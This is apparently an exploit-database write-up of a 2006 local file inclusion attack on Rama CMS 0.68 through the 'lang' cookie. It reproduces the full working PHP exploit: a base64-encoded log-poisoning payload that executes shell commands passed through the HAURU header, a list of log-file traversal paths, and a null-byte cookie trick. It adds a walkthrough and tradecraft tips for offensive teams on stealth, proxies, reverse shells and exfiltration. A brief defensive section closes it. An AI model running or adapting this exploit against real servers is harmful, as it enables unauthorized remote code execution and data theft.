By exploitdb papers bot•November 12, 2006•
papers
Exploiting Rama CMS 0.68: A Deep Dive into Cookie-Based Local File Inclusion
Exploiting Rama CMS 0.68: A Deep Dive into Cookie-Based Local File Inclusion
What this paper is
This paper details a Local File Inclusion (LFI) vulnerability in Rama CMS version 0.68. The vulnerability is triggered by manipulating the lang cookie. By crafting a specific cookie value, an attacker can trick the application into including arbitrary local files, which can then be used to execute commands. The exploit provided is a PHP script designed to automate the discovery and exploitation of this vulnerability.
Simple technical breakdown
The core of the vulnerability lies in how Rama CMS handles language settings.
- Cookie Handling: The application checks for a
langcookie. If it exists, it uses its value to set a$langvariable. - File Inclusion: The application then attempts to include a PHP file from the
language/directory based on the$langvariable. For example, if$langis "en", it tries to includelanguage/en.php. - The Flaw: The vulnerability occurs because the application doesn't properly sanitize the value of the
langcookie before using it in theinclude_once()function. This allows an attacker to provide a path traversal sequence (like../../..) within the cookie, pointing to files outside the intendedlanguage/directory. - Exploitation: The exploit leverages this by setting the
langcookie to a path traversal sequence followed by a target log file (e.g.,../../../../../var/log/httpd/access_log). The attacker then injects a command into a request that will be logged by the web server. When the application includes the log file, it effectively includes the attacker's command, leading to Remote Code Execution (RCE).
Complete code and payload walkthrough
The provided PHP exploit script automates the process of finding and exploiting the LFI vulnerability.
1. Header and ASCII Art:
The script begins with a large ASCII art representation of "DEVIL TEAM" and some introductory messages, including team greetings and contact information. This is purely decorative and has no functional impact on the exploit.
2. Exploit Information:
/*
works with register_globals=On
in lang.php line 27-43:
....
if(isset($_GET['lang'])){
setcookie('lang',htmlspecialchars($_GET['lang']));
$lang = htmlspecialchars($_GET['lang']);
$_COOKIE['lang'] = $lang;
}else if(isset($_COOKIE['lang'])){ // <-------{1}
$lang = htmlspecialchars($_COOKIE['lang']);
}else{
$lang = DEFAUL_LANG;
$_COOKIE['lang'] = $lang; // <-------{2}
}
if(file_exists("language/$lang.php")){
include_once("language/$lang.php"); // <-------{3}
}else{
include_once("language/en.php");
}
?>
....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Kacper ;)
*/This comment block is crucial. It explains the vulnerability's origin within lang.php (lines 27-43).
{1}points to where the script checks for an existinglangcookie.{2}shows the default language handling.{3}highlights the vulnerableinclude_once("language/$lang.php");line. Thehtmlspecialchars()function is used, but it's applied after the cookie is read and before it's used in theinclude_once, which is insufficient to prevent path traversal if the input is crafted correctly. The comment also notes that this exploit relies onregister_globals=On.
3. Command Line Argument Handling:
if ($argc<4) {
// ... usage instructions ...
die;
}
// ...
$host=$argv[1];
$path=$argv[2];
$cmd="";
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}- This section checks if the correct number of command-line arguments are provided.
- It defines usage instructions if insufficient arguments are given.
- It parses the arguments:
$host: The target server's IP or hostname.$path: The base path to the Rama CMS installation.$cmd: The shell command to execute (e.g.,ls -la).-p[port]: An optional argument to specify a non-default HTTP port.-P[ip:port]: An optional argument to specify an HTTP proxy.
$pis constructed based on whether a proxy is used, forming the base URL for requests.
4. Initialization and Helper Functions:
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function wyslij_pakiety($pakiet)
{
global $proxy, $host, $port, $html, $proxy_regex;
// ... socket connection logic ...
fputs($ock,$pakiet);
// ... HTML response reading logic ...
fclose($ock);
}
function quick_dump($string)
{
// ... hex/ascii dump formatting ...
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}error_reporting(0)andini_set()disable error reporting and set timeouts/execution limits for the script.wyslij_pakiety($pakiet): This function is responsible for sending HTTP requests. It handles both direct connections to the target host and connections through a specified proxy. It reads the response and stores it in the global$htmlvariable.quick_dump($string): A utility function to display raw data in a hex/ASCII format, useful for debugging.$proxy_regex: A regular expression to validate proxy addresses.make_seed(): A function to generate a random seed, though it's not explicitly used in the main exploit logic.
5. Payload Injection (Log Poisoning):
echo "[1] insert evil code in logfiles ...\r\n\r\n";
$hauru = base64_decode("PD9waHAgb2JfY2xlYW4oKTsvL1J1Y2hvbXkgemFtZWsgSGF1cnUgOy0pZWNobyIuL".
"i5IYWNrZXIuLkthY3Blci4uTWFkZS4uaW4uLlBvbGFuZCEhLi4uREVWSUwuVEVBTS".
"4udGhlLi5iZXN0Li5wb2xpc2guLnRlYW0uLkdyZWV0ei4uLiI7ZWNobyIuLi5HbyB".
"UbyBERVZJTCBURUFNIElSQzogNzIuMjAuMTguNjo2NjY3ICNkZXZpbHRlYW0iO2Vj".
"aG8iLi4uREVWSUwgVEVBTSBTSVRFOiBodHRwOi8vd3d3LnJhaGltLndlYmQucGwvI".
"jtpbmlfc2V0KCJtYXhfZXhlY3V0aW9uX3RpbWUiLDApO2VjaG8gIkhhdXJ1IjtwYX".
"NzdGhydSgkX1NFUlZFUltIVFRQX0hBVVJVXSk7ZGllOz8+");
$pakiet="GET ".$p.$hauru." HTTP/1.0\r\n";
$pakiet.="User-Agent: ".$hauru." Googlebot/2.1\r\n";
$pakiet.="Host: ".$host."\r\n";
$pakiet.="Connection: close\r\n\r\n";
wyslij_pakiety($pakiet);
sleep(3);$hauruis a Base64 encoded string. Decoding it reveals a PHP payload:<?php ob_clean(); //Ruchomy zamek Hauru ;)echo ".... hacker.Kacper.Made.in.Poland!!...DEVIL.TEAM.the.best.polish.team.Greetz...". "Go To DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam";echo "..DEVIL TEAM SITE: http://www.rahim.webd.pl/";ini_set("max_execution_time",0);echo "Hauru";passthru($_SERVER['HTTP_HAURU']);die;?>ob_clean(): Cleans output buffers.- Prints greeting messages and team information.
ini_set("max_execution_time",0): Sets infinite execution time.echo "Hauru";: Prints a marker string "Hauru". This is important for later verification.passthru($_SERVER['HTTP_HAURU']);: This is the core command execution part. It takes the value from theHTTP_HAURUheader and executes it as a shell command.die;: Terminates script execution.
- The script then constructs an HTTP GET request to the target path (
$p) with the decoded$haurupayload appended. This request is sent usingwyslij_pakiety(). TheUser-Agentheader is also set to include the$haurupayload, which is a clever way to inject it into the web server's logs. Thesleep(3)pauses execution, allowing the server to process the request and write to logs.
6. Path Traversal and File Inclusion Loop:
$paths= array (
"../../../../../var/log/httpd/access_log",
// ... many other common log paths ...
"../../../../../var/log/error_log"
);
for ($i=0; $i<=count($paths)-1; $i++)
{
$a=$i+2;
echo "[".$a."] Check Path: ".$paths[$i]."\r\n";
echo "remote code execution...wait..\n";
$pakiet ="GET ".$p."lang.php HTTP/1.1\r\n";
$pakiet.="Cookie: lang=../".$paths[$i]."%00;\r\n"; // <-- Vulnerable part
$pakiet.="HAURU: ".$cmd."\r\n"; // <-- Command injected here
$pakiet.="Host: ".$host."\r\n";
$pakiet.="Connection: Close\r\n\r\n";
wyslij_pakiety($pakiet);
if (strstr($html,"Hauru"))
{
$temp=explode("Hauru",$html);
die($temp[1]);
}
}
echo "Exploit err0r :(\r\n";
echo "Go to DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam\r\n";
?>$paths: An array containing a comprehensive list of common web server log file paths, using path traversal sequences (../).- The
forloop iterates through each path in the$pathsarray. - Inside the loop:
- A new HTTP GET request is constructed targeting
lang.php. Cookie: lang=../".$paths[$i]."%00;: This is the critical part. Thelangcookie is set to a path traversal sequence (../repeated) followed by the current log file path from the$pathsarray. The%00is a null byte, which in older PHP versions could be used to truncate strings and bypass certain file extension checks, though its effectiveness varies. The semicolon;is also part of the cookie syntax.HAURU: ".$cmd."\r\n: The command to be executed ($cmd) is sent as theHAURUHTTP header. This header is read by the injected PHP payload (passthru($_SERVER['HTTP_HAURU'])).- The request is sent using
wyslij_pakiety(). if (strstr($html,"Hauru")): The script checks if the response ($html) contains the "Hauru" marker string that was echoed by the injected payload. If found, it means the payload was successfully included and executed.$temp=explode("Hauru",$html); die($temp[1]);: The response is split by "Hauru", and the part after it (which should be the output of the executed command) is printed and the script terminates.
- A new HTTP GET request is constructed targeting
- If the loop completes without finding the "Hauru" marker, an error message is displayed.
Code Fragment/Block -> Practical Purpose Mapping:
- ASCII Art & Greetings: Informational, team branding.
- Comment Block (lang.php logic): Explains the vulnerability mechanism and prerequisites (
register_globals=On). - Argument Parsing (
$argc,$argv): Defines how the script takes target details and commands from the user. wyslij_pakiety()function: Handles network communication (sending requests, receiving responses), abstracting direct socket programming.- Base64 Decoded Payload (
$hauru): The actual PHP code injected into the server's logs, designed to execute commands viapassthru. - First
wyslij_pakiety()call (Log Poisoning): Injects the command-execution payload into web server logs via theUser-Agentheader, hoping it will be logged. $pathsarray: A list of potential log file locations to attempt inclusion.- Looping through
$paths: Iterates through possible LFI targets. Cookie: lang=../...%00;: The core LFI exploit vector, using path traversal to include arbitrary files.HAURU: $cmdheader: Delivers the command to the injected payload for execution.strstr($html,"Hauru")check: Verifies successful command execution by looking for the payload's marker.explode("Hauru",$html); die($temp[1]);: Extracts and displays the command output.
Practical details for offensive operations teams
- Required Access Level: No elevated privileges are required on the target system itself. The exploit targets a web application accessible over HTTP/HTTPS.
- Lab Preconditions:
- A target server running Rama CMS version 0.68 or earlier.
- The web server must be configured with
register_globals = On. This is a critical prerequisite and a significant security weakness in itself, common in older PHP applications. - The web server must be logging requests to a file that can be included via LFI. Common log files like
access_logorerror_logare targeted. - Network connectivity from the attacker's machine to the target web server (and potentially a proxy if used).
- Tooling Assumptions:
- A PHP interpreter to run the exploit script.
- Basic network tools (like
pingortraceroute) for initial reconnaissance. - A proxy server if the
-Poption is used.
- Execution Pitfalls:
register_globals = Off: Ifregister_globalsis disabled on the target server, the exploit will likely fail as the injected variables won't be automatically populated.- Incorrect Path: The
$pathsarray contains common log locations. If the web server logs to a non-standard path, the exploit will fail to find the log file. Manual reconnaissance might be needed to identify the correct log path. - Web Application Firewall (WAF): WAFs might detect and block the crafted cookie or the
HAURUheader. - Null Byte Handling: Older PHP versions were more susceptible to null byte (
%00) truncation. Newer versions might ignore or handle it differently, potentially breaking the exploit. - Log Rotation: If log files are rotated frequently, the injected payload might be written to a log file that is no longer accessible via the current path traversal.
- Output Filtering: The web application might filter or sanitize the output of the
passthrucommand, making it difficult to see the command's result. - Incorrect Target Path: If the
$pathargument is incorrect, the exploit will target the wrong location. - Firewall Rules: Network firewalls could block the connection to the target port.
- Tradecraft Considerations:
- Stealth: The initial payload injection uses the
User-Agentheader, which is less suspicious than a direct GET parameter. However, the subsequent LFI requests are more overt. - Obfuscation: The exploit script itself is not heavily obfuscated. For more stealth, the PHP payload could be further obfuscated.
- Proxy Usage: Using a proxy (
-Poption) can help mask the attacker's origin IP address. - Timing: The
sleep(3)is a rudimentary delay. In a real engagement, timing might need to be adjusted based on server load or network latency. - Command Selection: The chosen command (
ls -la) is for reconnaissance. For actual exploitation, commands like reverse shells or data exfiltration tools would be used. The output of these commands needs to be captured and exfiltrated. - Error Handling: The script's error handling is basic. A more sophisticated attacker might implement more robust error checking and retry mechanisms.
- Stealth: The initial payload injection uses the
- Expected Telemetry:
- Web Server Access Logs:
- The initial request with the
User-Agentcontaining the PHP payload. - Subsequent requests to
lang.phpwith the craftedlangcookie andHAURUheader. - Entries corresponding to the injected payload in the log file being included (if the log file itself is accessible via HTTP).
- The initial request with the
- Web Server Error Logs: Potential errors related to file inclusion failures, permission issues, or PHP execution errors.
- Network Traffic: HTTP requests originating from the attacker's IP (or proxy IP) to the target web server.
- Application Logs: If the application itself has logging, it might record the attempts or errors.
- System Logs (on target): If the executed command interacts with the OS, system logs might show activity.
- Web Server Access Logs:
Where this was used and when
- Year: Published in 2006. This indicates the vulnerability was active and exploitable around that time.
- Context: Exploits for web applications like CMS platforms were very common in the mid-2000s. LFI vulnerabilities were a frequent attack vector, especially on PHP applications where
register_globalswas still enabled. - Usage: This type of exploit would have been used by attackers to gain unauthorized access to web servers, deface websites, steal data, or use the compromised server as a pivot point for further attacks. It's a classic example of how insecure coding practices in web applications can lead to significant security breaches.
Defensive lessons for modern teams
- Disable
register_globals: This is a fundamental security setting for PHP. It should always be turned off. Modern PHP versions have removed this directive entirely. - Input Validation and Sanitization: Never trust user input, especially from cookies, GET, or POST parameters. Always validate and sanitize input thoroughly before using it in file operations, database queries, or command execution. Use functions like
filter_var()and ensure paths are canonicalized and restricted to expected directories. - Secure File Inclusion:
- Avoid including files based on user-supplied input.
- If file inclusion is necessary, use a whitelist of allowed files or paths.
- Use functions like
realpath()to resolve paths and prevent traversal. - Be cautious with
include_onceandrequire_oncewhen the path is dynamic.
- Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns like LFI, SQL injection, and XSS.
- Regular Patching and Updates: Keep CMS platforms and all their components (including the underlying web server and PHP interpreter) updated to the latest secure versions. This vulnerability is in an old version of Rama CMS, highlighting the importance of migration.
- Secure Configuration: Ensure web server and application configurations are hardened, disabling unnecessary features and enabling security-related directives.
- Logging and Monitoring: Implement comprehensive logging for web server access and errors. Monitor these logs for suspicious activity, such as unusual requests, repeated LFI attempts, or unexpected file inclusions.
ASCII visual (if applicable)
This exploit involves a chain of events. A simplified visual representation of the LFI part:
+-----------------+ +-----------------+ +-----------------+
| Attacker's Host | ----> | Web Server | ----> | Rama CMS App |
| (Exploit Script)| | (Receives Req.) | | (lang.php) |
+-----------------+ +-----------------+ +-----------------+
| |
| 1. Sends HTTP Req. with | 3. Reads 'lang' cookie
| Cookie: lang=../../log.txt%00; | (e.g., ../../log.txt%00;)
| HAURU: <command> |
| |
| | 4. Tries to include
| | language/../../log.txt%00;.php
| | (Path traversal occurs)
| |
| | 5. Includes target log file
| | (e.g., /var/log/access.log)
| | which contains injected payload.
| |
| | 6. Injected payload executes
| | <command> via passthru().
| | Outputs "Hauru" + command result.
+-----------------------------------------------------> 7. Response sent back
containing "Hauru" + command output.Explanation of the visual:
- The attacker sends a request to the web server.
- The request contains a crafted
langcookie and aHAURUheader with the command. - The Rama CMS application reads the
langcookie. - It attempts to
include_oncea file based on the cookie value. Due to path traversal (../../), it bypasses thelanguage/directory. - The application successfully includes a target log file (which the attacker previously "poisoned" with a PHP payload).
- The included log file's content (the injected PHP payload) is executed. This payload uses
passthruto run the command from theHAURUheader and echoes a marker ("Hauru") followed by the command's output. - The web server sends the response back to the attacker, containing the marker and the command's output, confirming successful execution.
Source references
- Paper URL: https://www.exploit-db.com/papers/2760
- Raw Exploit URL: https://www.exploit-db.com/raw/2760
- Exploit-DB Archive: Exploit-DB (exploit-db.com) is a public database of exploits, exploits, proof-of-concepts, and security research.
Original Exploit-DB Content (Verbatim)
<?
print '
::::::::: :::::::::: ::: ::: ::::::::::: :::
:+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +:+ +#++:++# +#+ +:+ +#+ +#+
+#+ +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+#+#+# #+# #+#
######### ########## ### ########### ##########
::::::::::: :::::::::: ::: :::: ::::
:+: :+: :+: :+: +:+:+: :+:+:+
+:+ +:+ +:+ +:+ +:+ +:+:+ +:+
+#+ +#++:++# +#++:++#++: +#+ +:+ +#+
+#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+#
### ########## ### ### ### ###
- - [DEVIL TEAM THE BEST POLISH TEAM] - -
[Exploit name: Rama CMS <= 0.68 (Cookie: lang) Local File Include Exploit
[Script name: Rama CMS v.0.68
[Script site: http://www.hotscripts.com/jump.php?listing_id=48318&jump_type=1
Find by: Kacper (a.k.a Rahim)
========> DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam <========
========> http://www.rahim.webd.pl/ <========
Contact: kacper1964@yahoo.pl
(c)od3d by Kacper
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings DragonHeart and all DEVIL TEAM Patriots :)
- Leito & Leon
TomZen, Gelo, Ramzes, DMX, Ci2u, Larry, @steriod, Drzewko, CrazzyIwan, Rammstein
Adam., Kicaj., DeathSpeed, Arkadius, Michas, pepi, nukedclx, SkD, MXZ, sysios,
mIvus, nukedclx, SkD, wacky, xoron
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings for 4ll Fusi0n Group members ;-)
and all members of hacker.com.pl ;)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
';
/*
works with register_globals=On
in lang.php line 27-43:
....
if(isset($_GET['lang'])){
setcookie('lang',htmlspecialchars($_GET['lang']));
$lang = htmlspecialchars($_GET['lang']);
$_COOKIE['lang'] = $lang;
}else if(isset($_COOKIE['lang'])){ // <-------{1}
$lang = htmlspecialchars($_COOKIE['lang']);
}else{
$lang = DEFAUL_LANG;
$_COOKIE['lang'] = $lang; // <-------{2}
}
if(file_exists("language/$lang.php")){
include_once("language/$lang.php"); // <-------{3}
}else{
include_once("language/en.php");
}
?>
....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Kacper ;)
*/
if ($argc<4) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' host path cmd OPTIONS
host: target server (ip/hostname)
path: Rama CMS path
cmd: a shell command (ls -la)
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' 2.2.2.2 /Rama_CMS/ ls -la -P1.1.1.1:80
php '.$argv[0].' 1.1.1.1 / ls -la
-----------------------------------------------------------------------------
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function wyslij_pakiety($pakiet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$pakiet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}
$host=$argv[1];
$path=$argv[2];
$cmd="";
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
echo "[1] insert evil code in logfiles ...\r\n\r\n";
$hauru = base64_decode("PD9waHAgb2JfY2xlYW4oKTsvL1J1Y2hvbXkgemFtZWsgSGF1cnUgOy0pZWNobyIuL".
"i5IYWNrZXIuLkthY3Blci4uTWFkZS4uaW4uLlBvbGFuZCEhLi4uREVWSUwuVEVBTS".
"4udGhlLi5iZXN0Li5wb2xpc2guLnRlYW0uLkdyZWV0ei4uLiI7ZWNobyIuLi5HbyB".
"UbyBERVZJTCBURUFNIElSQzogNzIuMjAuMTguNjo2NjY3ICNkZXZpbHRlYW0iO2Vj".
"aG8iLi4uREVWSUwgVEVBTSBTSVRFOiBodHRwOi8vd3d3LnJhaGltLndlYmQucGwvI".
"jtpbmlfc2V0KCJtYXhfZXhlY3V0aW9uX3RpbWUiLDApO2VjaG8gIkhhdXJ1IjtwYX".
"NzdGhydSgkX1NFUlZFUltIVFRQX0hBVVJVXSk7ZGllOz8+");
$pakiet="GET ".$p.$hauru." HTTP/1.0\r\n";
$pakiet.="User-Agent: ".$hauru." Googlebot/2.1\r\n";
$pakiet.="Host: ".$host."\r\n";
$pakiet.="Connection: close\r\n\r\n";
wyslij_pakiety($pakiet);
sleep(3);
$paths= array (
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
for ($i=0; $i<=count($paths)-1; $i++)
{
$a=$i+2;
echo "[".$a."] Check Path: ".$paths[$i]."\r\n";
echo "remote code execution...wait..\n";
$pakiet ="GET ".$p."lang.php HTTP/1.1\r\n";
$pakiet.="Cookie: lang=../".$paths[$i]."%00;\r\n";
$pakiet.="HAURU: ".$cmd."\r\n";
$pakiet.="Host: ".$host."\r\n";
$pakiet.="Connection: Close\r\n\r\n";
wyslij_pakiety($pakiet);
if (strstr($html,"Hauru"))
{
$temp=explode("Hauru",$html);
die($temp[1]);
}
}
echo "Exploit err0r :(\r\n";
echo "Go to DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam\r\n";
?>
# milw0rm.com [2006-11-12]